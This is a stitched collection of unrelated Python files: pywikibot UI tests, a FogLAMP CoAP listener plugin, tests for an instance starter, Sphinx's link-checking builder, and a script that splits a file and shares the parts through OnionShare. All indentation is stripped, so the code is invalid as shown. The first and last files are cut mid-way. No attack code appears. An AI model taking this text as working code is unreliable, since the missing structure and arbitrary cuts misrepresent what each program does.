self.assertEqual(newstderr.getvalue(), "output\n")
def test_output_stdout(self):
pywikibot.output("output", toStdout=True)
self.assertEqual(newstdout.getvalue(), "output\n")
self.assertEqual(newstderr.getvalue(), "")
def test_warning(self):
pywikibot.warning("warning")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "WARNING: warning\n")
def test_error(self):
pywikibot.error("error")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "ERROR: error\n")
def test_log(self):
pywikibot.log("log")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "")
def test_critical(self):
pywikibot.critical("critical")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "CRITICAL: critical\n")
def test_debug(self):
pywikibot.debug("debug", "test")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "")
def test_exception(self):
class TestException(Exception):
pass
try:
raise TestException("Testing Exception")
except TestException:
pywikibot.exception("exception")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "ERROR: TestException: Testing Exception\n")
def test_exception_tb(self):
class TestException(Exception):
pass
try:
raise TestException("Testing Exception")
except TestException:
pywikibot.exception("exception", tb=True)
self.assertEqual(newstdout.getvalue(), "")
stderrlines = newstderr.getvalue().split("\n")
self.assertEqual(stderrlines[0], "ERROR: TestException: Testing Exception")
self.assertEqual(stderrlines[1], "Traceback (most recent call last):")
self.assertEqual(stderrlines[3], """ raise TestException("Testing Exception")""")
self.assertEqual(stderrlines[4], "TestException: Testing Exception")
self.assertNotEqual(stderrlines[-1], "\n")
class TestTerminalInput(UITestCase):
def testInput(self):
newstdin.write("input to read\n")
newstdin.seek(0)
returned = pywikibot.input("question")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ")
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, u"input to read")
@unittest.expectedFailure
def testInputChoiceDefault(self):
newstdin.write("\n")
newstdin.seek(0)
returned = pywikibot.inputChoice("question", ["answer 1", "answer 2", "answer 3"], ["A", "N", "S"], "A")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ([A]nswer 1, a[N]swer 2, an[S]wer 3) ")
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, "a")
def testInputChoiceCapital(self):
newstdin.write("N\n")
newstdin.seek(0)
returned = pywikibot.inputChoice("question", ["answer 1", "answer 2", "answer 3"], ["A", "N", "S"], "A")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ([A]nswer 1, a[N]swer 2, an[S]wer 3) ")
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, "n")
def testInputChoiceNonCapital(self):
newstdin.write("n\n")
newstdin.seek(0)
returned = pywikibot.inputChoice("question", ["answer 1", "answer 2", "answer 3"], ["A", "N", "S"], "A")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ([A]nswer 1, a[N]swer 2, an[S]wer 3) ")
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, "n")
def testInputChoiceIncorrectAnswer(self):
newstdin.write("X\nN\n")
newstdin.seek(0)
returned = pywikibot.inputChoice("question", ["answer 1", "answer 2", "answer 3"], ["A", "N", "S"], "A")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "question ([A]nswer 1, a[N]swer 2, an[S]wer 3) "*2)
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, "n")
@unittest.skipUnless(os.name == "posix", "requires Unix console")
class TestTerminalOutputColorUnix(UITestCase):
def testOutputColorizedText(self):
pywikibot.output(u"normal text \03{lightpurple}light purple text\03{default} normal text")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "normal text \x1b[35;1mlight purple text\x1b[0m normal text\n\x1b[0m")
def testOutputNoncolorizedText(self):
pywikibot.config.colorized_output = False
pywikibot.output(u"normal text \03{lightpurple}light purple text\03{default} normal text")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "normal text light purple text normal text ***\n")
@unittest.expectedFailure
def testOutputColorCascade(self):
pywikibot.output(u"normal text \03{lightpurple} light purple \03{lightblue} light blue \03{default} light purple \03{default} normal text")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "normal text \x1b[35;1m light purple \x1b[94;1m light blue \x1b[35;1m light purple \x1b[0m normal text\n\x1b[0m")
def testOutputColorCascade_incorrect(self):
''' This test documents current (incorrect) behavior '''
pywikibot.output(u"normal text \03{lightpurple} light purple \03{lightblue} light blue \03{default} light purple \03{default} normal text")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "normal text \x1b[35;1m light purple \x1b[94;1m light blue \x1b[0m light purple \x1b[0m normal text\n\x1b[0m")
@unittest.skipUnless(os.name == "posix", "requires Unix console")
class TestTerminalUnicodeUnix(UITestCase):
def testOutputUnicodeText(self):
pywikibot.output(u"Заглавная_страница")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), u"Заглавная_страница\n".encode('utf-8'))
def testInputUnicodeText(self):
newstdin.write(u"Заглавная_страница\n".encode('utf-8'))
newstdin.seek(0)
returned = pywikibot.input(u"Википедию? ")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), u"Википедию? ".encode('utf-8'))
self.assertIsInstance(returned, unicode)
self.assertEqual(returned, u"Заглавная_страница")
@unittest.skipUnless(os.name == "posix", "requires Unix console")
class TestTransliterationUnix(UITestCase):
def testOutputTransliteratedUnicodeText(self):
pywikibot.ui.encoding = 'latin-1'
pywikibot.config.transliterate = True
pywikibot.output(u"abcd АБГД αβγδ あいうえお")
self.assertEqual(newstdout.getvalue(), "")
self.assertEqual(newstderr.getvalue(), "abcd \x1b[33;1mA\x1b[0m\x1b[33;1mB\x1b[0m\x1b[33;1mG\x1b[0m\x1b[33;1mD\x1b[0m \x1b[33;1ma\x1b[0m\x1b[33;1mb\x1b[0m\x1b[33;1mg\x1b[0m\x1b[33;1md\x1b[0m \x1b[33;1ma\x1b[0m\x1b[33;1mi\x1b[0m\x1b[33;1mu\x1b[0m\x1b[33;1me\x1b[0m\x1b[33;1mo\x1b[0m\n\x1b[0m") # noqa
@unittest.skipUnless(os.name == "nt", "requires Windows console")
class TestWindowsTerminalUnicode(UITestCase):
@classmethod
def setUpClass(cls):
import inspect
import pywinauto
import subprocess
si = subprocess.STARTUPINFO()
si.dwFlags = subprocess.STARTF_USESTDHANDLES
fn = inspect.getfile(inspect.currentframe())
cls._process = subprocess.Popen(["python", "pwb.py", fn, "--run-as-slave-interpreter"],
creationflags=subprocess.CREATE_NEW_CONSOLE)
_manager.connect()
cls.pywikibot = _manager.pywikibot()
cls._app = pywinauto.application.Application()
cls._app.connect_(process=cls._process.pid)
# set truetype font (Lucida Console, hopefully)
cls._app.window_().TypeKeys("% {UP}{ENTER}^L{HOME}L{ENTER}", with_spaces=True)
@classmethod
def tearDownClass(cls):
del cls.pywikibot
cls._process.kill()
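# The helpers below drive the real console window through pywinauto menu keystrokes:
# getstdouterr() selects all console text and copies it out via the clipboard,
# setclip()/getclip() move unicode text in and out of the Windows clipboard, and
# sendstdin() pastes text into the console as if it had been typed.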
def getstdouterr(self):
# select all and copy to clipboard
self._app.window_().SetFocus()
self._app.window_().TypeKeys('% {UP}{UP}{UP}{RIGHT}{DOWN}{DOWN}{DOWN}{ENTER}{ENTER}', with_spaces=True)
return self.getclip()
def setclip(self, text):
win32clipboard.OpenClipboard()
win32clipboard.SetClipboardData(win32clipboard.CF_UNICODETEXT, unicode(text))
win32clipboard.CloseClipboard()
def getclip(self):
win32clipboard.OpenClipboard()
data = win32clipboard.GetClipboardData(win32clipboard.CF_UNICODETEXT)
win32clipboard.CloseClipboard()
data = data.split(u"\x00")[0]
data = data.replace(u"\r\n", u"\n")
return data
def sendstdin(self, text):
self.setclip(text.replace(u"\n", u"\r\n"))
self._app.window_().SetFocus()
self._app.window_().TypeKeys('% {UP}{UP}{UP}{RIGHT}{DOWN}{DOWN}{ENTER}', with_spaces=True)
self.setclip(u'')
def setUp(self):
super(TestWindowsTerminalUnicode, self).setUp()
self.pywikibot.set_config('colorized_output', True)
self.pywikibot.set_config('transliterate', False)
self.pywikibot.set_config('console_encoding', 'utf-8')
self.pywikibot.set_ui('transliteration_target', None)
self.pywikibot.set_ui('encoding', 'utf-8')
self.pywikibot.cls()
self.setclip(u'')
def testOutputUnicodeText_no_transliterate(self):
self.pywikibot.output(u"Заглавная_страница")
self.assertEqual(self.getstdouterr(), u"Заглавная_страница\n")
def testOutputUnicodeText_transliterate(self):
self.pywikibot.set_config('transliterate', True)
self.pywikibot.set_ui('transliteration_target', 'latin-1')
self.pywikibot.output(u"Заглавная_страница")
self.assertEqual(self.getstdouterr(), "Zaglavnaya_stranica\n")
def testInputUnicodeText(self):
self.pywikibot.set_config('transliterate', True)
self.pywikibot.request_input(u"Википедию? ")
self.assertEqual(self.getstdouterr(), u"Википедию?")
self.sendstdin(u"Заглавная_страница\n")
returned = self.pywikibot.get_input()
self.assertEqual(returned, u"Заглавная_страница")
try:
try:
unittest.main()
except SystemExit:
pass
finally:
unpatch()
pywikibot.stopme()
else:
class TestTerminalUI(unittest.TestCase):
@unittest.skip("Terminal UI tests can only be run by directly running tests/ui_tests.py")
def testCannotBeRun(self):
pass
|
coap.py | # -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
"""CoAP handler for sensor readings"""
import asyncio
import copy
import logging
from threading import Thread
import aiocoap.resource
import aiocoap.error
import cbor2
from foglamp.common import logger
from foglamp.plugins.common import utils
import async_ingest
__author__ = "Terris Linenbach, Amarendra K Sinha"
__copyright__ = "Copyright (c) 2017 OSIsoft, LLC"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
_LOGGER = logger.setup(__name__, level=logging.INFO)
c_callback = None
c_ingest_ref = None
loop = None
_task = None
t = None
_DEFAULT_CONFIG = {
'plugin': {
'description': 'CoAP Listener South Plugin',
'type': 'string',
'default': 'coap',
'readonly': 'true'
},
'port': {
'description': 'Port to listen on',
'type': 'integer',
'default': '5683',
'order': '1',
'displayName': 'Port'
},
'uri': {
'description': 'URI to accept data on',
'type': 'string',
'default': 'sensor-values',
'order': '2',
'displayName': 'URI'
}
}
aiocoap_ctx = None
async def _start_aiocoap(uri, port):
root = aiocoap.resource.Site()
root.add_resource(('.well-known', 'core'),
aiocoap.resource.WKCResource(root.get_resources_as_linkheader))
root.add_resource(('other', uri), CoAPIngest())
global aiocoap_ctx
aiocoap_ctx = await aiocoap.Context().create_server_context(root, bind=('::', int(port)))
_LOGGER.info('CoAP listener started on port {} with uri {}'.format(port, uri))
def plugin_info():
""" Returns information about the plugin.
Args:
Returns:
dict: plugin information
Raises:
"""
return {'name': 'CoAP Plugin',
'version': '1.7.0',
'mode': 'async',
'type': 'south',
'interface': '1.0',
'config': _DEFAULT_CONFIG
}
def plugin_init(config):
""" Registers CoAP handler to accept sensor readings
Args:
config: JSON configuration document for the South plugin configuration category
Returns:
handle: JSON object to be used in future calls to the plugin
Raises:
"""
handle = copy.deepcopy(config)
return handle
def plugin_start(handle):
""" Starts the South service ingress process.
Used only for plugins that support async IO.
Args:
handle: handle returned by the plugin initialisation call
Returns:
Raises:
"""
global _task, loop, t
uri = handle['uri']['value']
port = handle['port']['value']
loop = asyncio.new_event_loop()
_task = asyncio.ensure_future(_start_aiocoap(uri, port), loop=loop)
def run():
global loop
loop.run_forever()
t = Thread(target=run)
t.start()
def plugin_reconfigure(handle, new_config):
""" Reconfigures the plugin
It should be called when the configuration of the plugin is changed during the operation of the South service;
The new configuration category should be passed.
Args:
handle: handle returned by the plugin initialisation call
new_config: JSON object representing the new configuration category
Returns:
new_handle: new handle to be used in the future calls
Raises:
"""
_LOGGER.info("Old config for CoAP plugin {} \n new config {}".format(handle, new_config))
plugin_shutdown(handle)
new_handle = plugin_init(new_config)
plugin_start(new_handle)
return new_handle
def plugin_shutdown(handle):
""" Shutdowns the plugin doing required cleanup, to be called prior to the South service being shut down.
Args:
handle: handle returned by the plugin initialisation call
Returns:
Raises:
"""
_LOGGER.info('Stopping South CoAP plugin...')
global aiocoap_ctx, _task, loop
try:
if aiocoap_ctx is not None:
asyncio.ensure_future(aiocoap_ctx.shutdown(), loop=loop)
if _task is not None:
_task.cancel()
_task = None
if loop is not None:
loop.stop()
except Exception as ex:
_LOGGER.exception('Error in shutting down CoAP plugin {}'.format(str(ex)))
raise
def plugin_register_ingest(handle, callback, ingest_ref):
"""Required plugin interface component to communicate to South C server
Args:
handle: handle returned by the plugin initialisation call
callback: C opaque object required to be passed back to the C->ingest method
ingest_ref: C opaque object required to be passed back to the C->ingest method
"""
global c_callback, c_ingest_ref
c_callback = callback
c_ingest_ref = ingest_ref
class CoAPIngest(aiocoap.resource.Resource):
"""Handles incoming sensor readings from CoAP"""
@staticmethod
async def render_post(request):
"""Store sensor readings from CoAP to FogLAMP
Args:
request:
The payload is a cbor-encoded array that decodes to JSON
similar to the following:
.. code-block:: python
{
"timestamp": "2017-01-02T01:02:03.23232Z-05:00",
"asset": "pump1",
"readings": {
"velocity": "500",
"temperature": {
"value": "32",
"unit": "kelvin"
}
}
}
"""
# aiocoap handlers must be defensive about exceptions. If an exception
# is raised out of a handler, it is permanently disabled by aiocoap.
# Therefore, Exception is caught instead of specific exceptions.
code = aiocoap.numbers.codes.Code.VALID
message = ''
try:
try:
payload = cbor2.loads(request.payload)
except Exception:
raise ValueError('Payload must be a dictionary')
asset = payload['asset']
timestamp = payload['timestamp']
# readings or sensor_values are optional
try:
readings = payload['readings']
except KeyError:
readings = payload['sensor_values'] # sensor_values is deprecated
# if optional then
# TODO: confirm, do we want to check this?
if not isinstance(readings, dict):
raise ValueError('readings must be a dictionary')
data = {
'asset': asset,
'timestamp': timestamp,
'readings': readings
}
async_ingest.ingest_callback(c_callback, c_ingest_ref, data)
except (KeyError, ValueError, TypeError) as e:
_LOGGER.exception("%d: %s", aiocoap.numbers.codes.Code.BAD_REQUEST, str(e))
raise aiocoap.error.BadRequest(str(e))
except Exception as ex:
_LOGGER.exception("%d: %s", aiocoap.numbers.codes.Code.INTERNAL_SERVER_ERROR, str(ex))
raise aiocoap.error.ConstructionRenderableError(str(ex))
return aiocoap.Message(payload=message.encode('utf-8'), code=code)
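# Hedged client-side sketch (not part of the original plugin): the render_post
# docstring above says the payload is CBOR that decodes to a dict with "asset",
# "timestamp" and "readings". Under that assumption, a client could post one
# reading as below; the host, port and the "sensor-values" URI segment simply
# mirror the plugin defaults and are illustrative only.
async def _example_post_reading():
    payload = cbor2.dumps({
        "timestamp": "2017-01-02T01:02:03.23232Z-05:00",
        "asset": "pump1",
        "readings": {"velocity": "500"}
    })
    context = await aiocoap.Context.create_client_context()
    request = aiocoap.Message(code=aiocoap.POST, payload=payload,
                              uri="coap://localhost:5683/other/sensor-values")
    response = await context.request(request).response
    return response.code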
|
test_instance_starter.py | # Copyright 2014 varnishapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import threading
import time
import unittest
import mock
from feaas import storage
from feaas.runners import instance_starter
class InstanceStarterTestCase(unittest.TestCase):
def test_init(self):
strg = storage.MongoDBStorage()
manager = mock.Mock(storage=strg)
starter = instance_starter.InstanceStarter(manager, interval=3)
self.assertEqual(manager, starter.manager)
self.assertEqual(strg, starter.storage)
self.assertEqual(3, starter.interval)
self.assertEqual(strg.db, starter.locker.db)
def test_loop_and_stop(self):
strg = mock.Mock()
manager = mock.Mock(storage=strg)
fake_run = mock.Mock()
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.run = fake_run
t = threading.Thread(target=starter.loop)
t.start()
time.sleep(1)
starter.stop()
t.join()
fake_run.assert_called_once()
self.assertFalse(starter.running)
def test_run(self):
instance = storage.Instance(name="something")
manager = mock.Mock(storage=mock.Mock())
get_instance = mock.Mock()
get_instance.return_value = instance
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.get_instance = get_instance
starter.start_instance = mock.Mock()
starter.run()
starter.get_instance.assert_called_once()
starter.start_instance.assert_called_with(instance)
def test_run_instance_not_found(self):
manager = mock.Mock(storage=mock.Mock())
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.get_instance = mock.Mock(side_effect=storage.InstanceNotFoundError())
starter.start_instance = mock.Mock()
starter.run()
starter.start_instance.assert_not_called()
def test_get_instance(self):
instance = storage.Instance(name="something")
strg = mock.Mock()
strg.retrieve_instance.return_value = instance
manager = mock.Mock(storage=strg)
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.locker = mock.Mock()
got_instance = starter.get_instance()
self.assertEqual(instance, got_instance)
self.assertEqual("starting", got_instance.state)
strg.retrieve_instance.assert_called_with(state="creating")
strg.store_instance.assert_called_with(instance)
starter.locker.lock.assert_called_with(starter.lock_name)
starter.locker.unlock.assert_called_with(starter.lock_name)
def test_get_instance_not_found(self):
strg = mock.Mock()
strg.retrieve_instance.side_effect = storage.InstanceNotFoundError()
manager = mock.Mock(storage=strg)
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.locker = mock.Mock()
with self.assertRaises(storage.InstanceNotFoundError):
starter.get_instance()
starter.locker.lock.assert_called_with(starter.lock_name)
starter.locker.unlock.assert_called_with(starter.lock_name)
def test_start_instance(self):
instance = storage.Instance(name="something")
strg = mock.Mock()
manager = mock.Mock(storage=strg)
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.locker = mock.Mock()
starter.start_instance(instance)
self.assertEqual("started", instance.state)
starter.locker.lock.assert_called_with(starter.lock_name)
manager.start_instance.assert_called_with(instance.name)
starter.locker.unlock.assert_called_with(starter.lock_name)
strg.store_instance.assert_called_with(instance, save_units=False)
@mock.patch("sys.stderr")
def test_start_instance_error(self, stderr):
instance = storage.Instance(name="something")
strg = mock.Mock()
manager = mock.Mock(storage=strg)
manager.start_instance.side_effect = ValueError("something went wrong")
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.locker = mock.Mock()
starter.start_instance(instance)
self.assertEqual("error", instance.state)
starter.locker.lock.assert_called_with(starter.lock_name)
starter.locker.unlock.assert_called_with(starter.lock_name)
strg.store_instance.assert_called_with(instance, save_units=False)
stderr.write.assert_called_with("[ERROR] failed to start instance: something went wrong\n")
|
linkcheck.py | # -*- coding: utf-8 -*-
"""
sphinx.builders.linkcheck
~~~~~~~~~~~~~~~~~~~~~~~~~
The CheckExternalLinksBuilder class.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import socket
import codecs
import threading
from os import path
from requests.exceptions import HTTPError
from six.moves import queue, html_parser
from six.moves.urllib.parse import unquote
from docutils import nodes
# 2015-06-25 barry@python.org. This exception was deprecated in Python 3.3 and
# removed in Python 3.5, however for backward compatibility reasons, we're not
# going to just remove it. If it doesn't exist, define an exception that will
# never be caught but leaves the code in check_anchor() intact.
try:
from six.moves.html_parser import HTMLParseError # type: ignore
except ImportError:
class HTMLParseError(Exception): # type: ignore
pass
from sphinx.builders import Builder
from sphinx.util import encode_uri, requests, logging
from sphinx.util.console import ( # type: ignore
purple, red, darkgreen, darkgray, darkred, turquoise
)
from sphinx.util.requests import is_ssl_error
if False:
# For type annotation
from typing import Any, Dict, List, Set, Tuple, Union # NOQA
from sphinx.application import Sphinx # NOQA
from sphinx.util.requests.requests import Response # NOQA
logger = logging.getLogger(__name__)
class AnchorCheckParser(html_parser.HTMLParser):
"""Specialized HTML parser that looks for a specific anchor."""
def __init__(self, search_anchor):
# type: (unicode) -> None
html_parser.HTMLParser.__init__(self)
self.search_anchor = search_anchor
self.found = False
def handle_starttag(self, tag, attrs):
for key, value in attrs:
if key in ('id', 'name') and value == self.search_anchor:
self.found = True
break
def check_anchor(response, anchor):
# type: (Response, unicode) -> bool
"""Reads HTML data from a response object `response` searching for `anchor`.
Returns True if anchor was found, False otherwise.
"""
parser = AnchorCheckParser(anchor)
try:
# Read file in chunks. If we find a matching anchor, we break
# the loop early in hopes not to have to download the whole thing.
for chunk in response.iter_content(chunk_size=4096, decode_unicode=True):
parser.feed(chunk)
if parser.found:
break
parser.close()
except HTMLParseError:
# HTMLParser is usually pretty good with sloppy HTML, but it tends to
# choke on EOF. But we're done then anyway.
pass
return parser.found
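# Hedged illustration (not part of Sphinx itself): AnchorCheckParser can be fed
# plain HTML directly, which mirrors what check_anchor() does chunk by chunk with
# a streamed response. The HTML snippet here is made up.
def _example_anchor_check():
    parser = AnchorCheckParser('install')
    parser.feed('<html><body><h1 id="install">Install</h1></body></html>')
    parser.close()
    return parser.found  # True, because an element with id="install" exists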
class CheckExternalLinksBuilder(Builder):
"""
Checks for broken external links.
"""
name = 'linkcheck'
def init(self):
# type: () -> None
self.to_ignore = [re.compile(x) for x in self.app.config.linkcheck_ignore]
self.anchors_ignore = [re.compile(x)
for x in self.app.config.linkcheck_anchors_ignore]
self.good = set() # type: Set[unicode]
self.broken = {} # type: Dict[unicode, unicode]
self.redirected = {} # type: Dict[unicode, Tuple[unicode, int]]
# set a timeout for non-responding servers
socket.setdefaulttimeout(5.0)
# create output file
open(path.join(self.outdir, 'output.txt'), 'w').close()
# create queues and worker threads
self.wqueue = queue.Queue() # type: queue.Queue
self.rqueue = queue.Queue() # type: queue.Queue
self.workers = [] # type: List[threading.Thread]
for i in range(self.app.config.linkcheck_workers):
thread = threading.Thread(target=self.check_thread)
thread.setDaemon(True)
thread.start()
self.workers.append(thread)
def check_thread(self):
# type: () -> None
kwargs = {}
if self.app.config.linkcheck_timeout:
kwargs['timeout'] = self.app.config.linkcheck_timeout
kwargs['allow_redirects'] = True
def check_uri():
# type: () -> Tuple[unicode, unicode, int]
# split off anchor
if '#' in uri:
req_url, anchor = uri.split('#', 1)
for rex in self.anchors_ignore:
if rex.match(anchor):
anchor = None
break
else:
req_url = uri
anchor = None
# handle non-ASCII URIs
try:
req_url.encode('ascii')
except UnicodeError:
req_url = encode_uri(req_url)
try:
if anchor and self.app.config.linkcheck_anchors:
# Read the whole document and see if #anchor exists
response = requests.get(req_url, stream=True, config=self.app.config,
**kwargs)
found = check_anchor(response, unquote(anchor))
if not found:
raise Exception("Anchor '%s' not found" % anchor)
else:
try:
# try a HEAD request first, which should be easier on
# the server and the network
response = requests.head(req_url, config=self.app.config, **kwargs)
response.raise_for_status()
except HTTPError as err:
# retry with GET request if that fails, some servers
# don't like HEAD requests.
response = requests.get(req_url, stream=True, config=self.app.config,
**kwargs)
response.raise_for_status()
except HTTPError as err:
if err.response.status_code == 401:
# We'll take "Unauthorized" as working.
return 'working', ' - unauthorized', 0
else:
return 'broken', str(err), 0
except Exception as err:
if is_ssl_error(err):
return 'ignored', str(err), 0
else:
return 'broken', str(err), 0
if response.url.rstrip('/') == req_url.rstrip('/'):
return 'working', '', 0
else:
new_url = response.url
if anchor:
new_url += '#' + anchor
# history contains any redirects, get last
if response.history:
code = response.history[-1].status_code
return 'redirected', new_url, code
else:
return 'redirected', new_url, 0
def check():
# type: () -> Tuple[unicode, unicode, int]
# check for various conditions without bothering the network
if len(uri) == 0 or uri.startswith(('#', 'mailto:', 'ftp:')):
return 'unchecked', '', 0
elif not uri.startswith(('http:', 'https:')):
return 'local', '', 0
elif uri in self.good:
return 'working', 'old', 0
elif uri in self.broken:
return 'broken', self.broken[uri], 0
elif uri in self.redirected:
return 'redirected', self.redirected[uri][0], self.redirected[uri][1]
for rex in self.to_ignore:
if rex.match(uri):
return 'ignored', '', 0
# need to actually check the URI
for _ in range(self.app.config.linkcheck_retries):
status, info, code = check_uri()
if status != "broken":
break
if status == "working":
self.good.add(uri)
elif status == "broken":
self.broken[uri] = info
elif status == "redirected":
self.redirected[uri] = (info, code)
return (status, info, code)
while True:
uri, docname, lineno = self.wqueue.get()
if uri is None:
break
status, info, code = check()
self.rqueue.put((uri, docname, lineno, status, info, code))
def process_result(self, result):
# type: (Tuple[unicode, unicode, int, unicode, unicode, int]) -> None
uri, docname, lineno, status, info, code = result
if status == 'unchecked':
return
if status == 'working' and info == 'old':
return
if lineno:
logger.info('(line %4d) ', lineno, nonl=1)
if status == 'ignored':
if info:
logger.info(darkgray('-ignored- ') + uri + ': ' + info)
else:
logger.info(darkgray('-ignored- ') + uri)
elif status == 'local':
logger.info(darkgray('-local- ') + uri)
self.write_entry('local', docname, lineno, uri)
elif status == 'working':
logger.info(darkgreen('ok ') + uri + info)
elif status == 'broken':
self.write_entry('broken', docname, lineno, uri + ': ' + info)
if self.app.quiet or self.app.warningiserror:
logger.warning('broken link: %s (%s)', uri, info,
location=(self.env.doc2path(docname), lineno))
else:
logger.info(red('broken ') + uri + red(' - ' + info))
elif status == 'redirected':
text, color = {
301: ('permanently', darkred),
302: ('with Found', purple),
303: ('with See Other', purple),
307: ('temporarily', turquoise),
0: ('with unknown code', purple),
}[code]
self.write_entry('redirected ' + text, docname, lineno,
uri + ' to ' + info)
logger.info(color('redirect ') + uri + color(' - ' + text + ' to ' + info))
def get_target_uri(self, docname, typ=None):
# type: (unicode, unicode) -> unicode
return ''
def get_outdated_docs(self):
# type: () -> Set[unicode]
return self.env.found_docs
def prepare_writing(self, docnames):
# type: (nodes.Node) -> None
return
def write_doc(self, docname, doctree):
# type: (unicode, nodes.Node) -> None
logger.info('')
n = 0
for node in doctree.traverse(nodes.reference):
if 'refuri' not in node:
continue
uri = node['refuri']
lineno = None
while lineno is None:
node = node.parent
if node is None:
break
lineno = node.line
self.wqueue.put((uri, docname, lineno), False)
n += 1
done = 0
while done < n:
self.process_result(self.rqueue.get())
done += 1
if self.broken:
self.app.statuscode = 1
def write_entry(self, what, docname, line, uri):
# type: (unicode, unicode, int, unicode) -> None
with codecs.open(path.join(self.outdir, 'output.txt'), 'a', 'utf-8') as output: # type: ignore # NOQA
output.write("%s:%s: [%s] %s\n" % (self.env.doc2path(docname, None),
line, what, uri))
def finish(self):
# type: () -> None
for worker in self.workers:
self.wqueue.put((None, None, None), False)
def setup(app):
# type: (Sphinx) -> Dict[unicode, Any]
app.add_builder(CheckExternalLinksBuilder)
app.add_config_value('linkcheck_ignore', [], None)
app.add_config_value('linkcheck_retries', 1, None)
app.add_config_value('linkcheck_timeout', None, None, [int])
app.add_config_value('linkcheck_workers', 5, None)
app.add_config_value('linkcheck_anchors', True, None)
# Anchors starting with ! are ignored since they are
# commonly used for dynamic pages
app.add_config_value('linkcheck_anchors_ignore', ["^!"], None)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
|
execute.py | import os
import sys
from flask import Flask
import requests as r
import time
import json
from signal import signal, SIGINT
import threading
from datetime import datetime
import numpy as np
import math
import glob
##globals##
threads = 8
threadL = []
orderAddr = []
order = []
startTimes = []
mainThread = None
totalAddr = None
totalStartTime = 0
content = [0] * threads #inits list with threads number of 0s
mode = '' #user, provider, or validator
fileName = ''
#######################################################################################################################################
###########################################################host########################################################################
#######################################################################################################################################
def shareOrder():
global totalStartTime
totalStartTime = time.time()
os.system("script -c \"~/onionshare/dev_scripts/onionshare --website totalOrder.txt" + "\" -f onionshareOrder.txt")
def startShare(file, iter):
#print(file + ":" + str(iter))
#start onionshare server to host file
os.system("script -c \"~/onionshare/dev_scripts/onionshare --website " + file + "\" -f onionshare" + str(iter) + ".txt")
def splitFile(file):
global fileName
fileName = file
f = open(file,'rb')
lines = f.readlines()
lineLen = len(lines)
pos = 0
#print(lines)
print(lineLen)
for i in range(0, threads):
fw = open(file+str(i)+'.txt' ,'wb')
lo = int((i)*(lineLen/threads))
hi = int((i+1)*(lineLen/threads))
print("lo:" + str(lo) + " hi:" + str(hi))
fw.writelines(lines[lo:hi])
fw.close()
order.append(file+str(i)+'.txt\n')
f.close()
f = open('order.txt', 'w')
f.writelines(order)
f.close()
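# Hedged helper (illustration only, not called anywhere): splitFile() above slices
# the file by integer partitions of its line count. These are the [lo, hi) bounds
# it would compute; for a 100-line file and 8 threads: (0, 12), (12, 25), (25, 37),
# (37, 50), (50, 62), (62, 75), (75, 87), (87, 100).
def exampleSliceBounds(lineLen, parts):
    return [(int(i * (lineLen / parts)), int((i + 1) * (lineLen / parts))) for i in range(parts)]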
def createThreadsHost():
f = open("order.txt" , 'r')
orderFile = f.readlines()
f.close()
j = 0
for i in orderFile:
t=threading.Thread(target=startShare,args=[i.strip('\n'),j])
threadL.append(t)
j += 1
def runThreads():
for i in threadL:
i.start()
startTimes.append(time.time())
def getAddrs():
for i in range(0,threads):
orderAddr.append(0)
t = 0
while t < threads:
t = 0
for i in orderAddr:
if i != 0:
t +=1
for i in range(0,threads):
if os.path.isfile('onionshare'+str(i)+'.txt'):
f = open('onionshare'+str(i)+'.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
orderAddr[i] = j.strip('\n') + "/" + order[i].strip('\n')
print(orderAddr)
time.sleep(5)
print(orderAddr)
f = open('totalOrder.txt', 'w')
for i in orderAddr:
f.write(i + '\n')
f.close()
def getTotalAddr():
global totalAddr
flag = True
while(flag):
if os.path.isfile('onionshareOrder.txt'):
f = open('onionshareOrder.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
totalAddr = j.strip('\n') + "/totalOrder.txt"
flag = False
time.sleep(5)
#Write address to file
f = open('totalOrderAddress.txt', 'w')
f.write(totalAddr)
f.close()
def threadRestarter():
while(True):
for i in range(0,threads):
if time.time() > startTimes[i] + 60 and orderAddr[i] == 0:
os.system('rm onionshare' + str(i) + '.txt')
threadL[i]._delete()
